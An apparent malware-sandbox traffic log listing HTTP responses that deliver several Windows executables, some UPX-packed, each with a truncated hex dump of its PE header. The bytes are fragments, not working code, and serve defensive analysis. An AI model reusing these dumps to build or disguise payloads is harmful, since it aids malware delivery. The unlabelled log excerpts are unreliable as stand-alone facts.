Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 23:48:55 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 05:59:50 GMTETag: "2e9600-6290c6c1b377a"Accept-Ranges: bytesContent-Length: 3053056Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 f6 8e 00 00 00 00 00 f0 00 22 00 0b 02 03 00 00 a0 2e 00 00 10 00 00 00 70 66 00 30 04 95 00 00 80 66 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 30 95 00 00 02 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 95 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 c0 91 00 54 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 66 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 a0 2e 00 00 80 66 00 00 92 2e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 20 95 00 00 02 00 00 00 94 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 34 2e 32 34 00 55 50 58 21 0d 24 0e 0a e9 ab 83 56 39 75 76 8e 25 e5 94 00 0a 84 2e 00 00 f8 8e 00 49 35 00 ee 3c 07 00 7f 88 04 e6 f1 01 95 50 6d e5 7c 45 e3 cd df 42 14 0d 32 40 b8 1a fb 86 9d e1 5e 31 73 4d 77 47 d9 33 01 fd 98 b9 a7 bb 09 ff ac 1e cc f1 42 54 49 d4 58 60 b5 28 ff cb f7 eb 90 22 e0 02 0f d9 19 55 19 06 f8 c2 7b 22 80 fd 37 c2 e8 19 b9 4e 18 65 28 17 3d 17 28 99 28 cc 1c 73 d5 13 57 44 64 80 3b 7b b1 4f 73 2f ed a0 30 1b 26 70 cb 60 fe ca 8b 91 0b 50 4e 01 77 13 cb c3 07 53 f4 af 95 25 f5 32 0a 53 9b 9b b5 8c 3f fb 86 38 11 37 78 2b d8 f9 f9 1b aa 76 9e 4a 81 a0 a1 d1 74 28 8d c6 95 3e 14 2e be b8 2f cc 7a 89 a7 6f 73 63 7a a2 0a 7f d3 16 cf fb 07 79 8b b2 cf a6 9e ca 2c 76 24 c5 ba 6a 5d 4d 08 cd 9f 9f a0 04 fd 1d 52 88 64 d8 09 68 31 61 05 c2 7d 8f db 7d 02 68 cd 19 92 c8 80 d8 2d e5 3d 85 55 34 c4 7d d9 1d 83 d6 97 79 a9 51 d7 f7 d3 ff 3a 9d a1 8d 47 f7 51 ff 19 b0 89 db 1e 11 a7 b5 fe a5 32 5d 17 e8 bd 30 5b 99 dd 5e e3 8d 3d 4b e8 3f f5 87 2f 3e 53 fa d1 db 0b b5 5a b5 ea ee c5 39 8c 70 76 b0 1e 75 bf fb c8 77 ff 93 c8 4f 6e 6d 25 81 45 12 cc 75 e0 13 71 c7 ec 8b 19 b3 ee 19 92 fb 13 5e 6e b0 20 07 c2 3c 67 ea 0d 43 4f c
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:01 GMTContent-Type: application/octet-streamContent-Length: 2791936Last-Modified: Thu, 12 Dec 2024 15:23:21 GMTConnection: keep-aliveETag: "675affe9-2a9a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 72 39 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 77 6d 6e 78 64 62 73 00 40 2a 00 00 a0 00 00 00 3a 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 73 72 74 6e 66 67 67 00 20 00 00 00 e0 2a 00 00 04 00 00 00 74 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 78 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:11 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:14 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:24 GMTContent-Type: application/octet-streamContent-Length: 393728Last-Modified: Thu, 12 Dec 2024 07:55:00 GMTConnection: keep-aliveETag: "675a96d4-60200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 67 05 00 64 00 00 00 00 30 06 00 98 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 61 05 00 00 10 00 00 00 62 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 80 05 00 00 60 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 7a 1e 00 00 30 06 00 00 3c 00 00 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:30 GMTContent-Type: application/octet-streamContent-Length: 2660864Last-Modified: Tue, 10 Dec 2024 07:14:44 GMTConnection: keep-aliveETag: "6757ea64-289a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 28 00 00 04 00 00 64 6d 29 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 18 25 00 28 00 00 00 00 40 25 00 25 fb 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 28 00 1c 7f 00 00 80 0d 25 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0c 25 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 32 af 24 00 00 10 00 00 00 b0 24 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 5e 00 00 00 c0 24 00 00 60 00 00 00 b4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 14 00 00 00 20 25 00 00 0a 00 00 00 14 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 25 fb 02 00 00 40 25 00 00 fc 02 00 00 1e 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 7f 00 00 00 40 28 00 00 80 00 00 00 1a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
